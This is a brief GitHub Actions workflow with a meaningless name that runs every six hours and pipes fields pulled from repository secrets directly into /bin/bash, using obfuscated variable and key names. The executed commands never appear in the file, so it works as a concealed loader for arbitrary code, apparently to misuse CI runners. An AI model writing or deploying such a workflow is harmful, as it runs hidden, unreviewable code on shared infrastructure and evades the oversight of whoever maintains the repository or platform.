name: elderlyremarkable
on:
  workflow_dispatch:
  schedule:
    - cron: '58 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: elderlyremarkable
        env:
          rhj39: ${{ secrets.rhj39 }}
        run: |
          echo $rhj39 | jq -r .jw5 | /bin/bash
          echo $ycep001 | jq -r .two6 | /bin/bash
          echo $pu0864 | jq -r .qykfg75 | /bin/bash
          echo $vvy14 | jq -r .b9 | /bin/bash

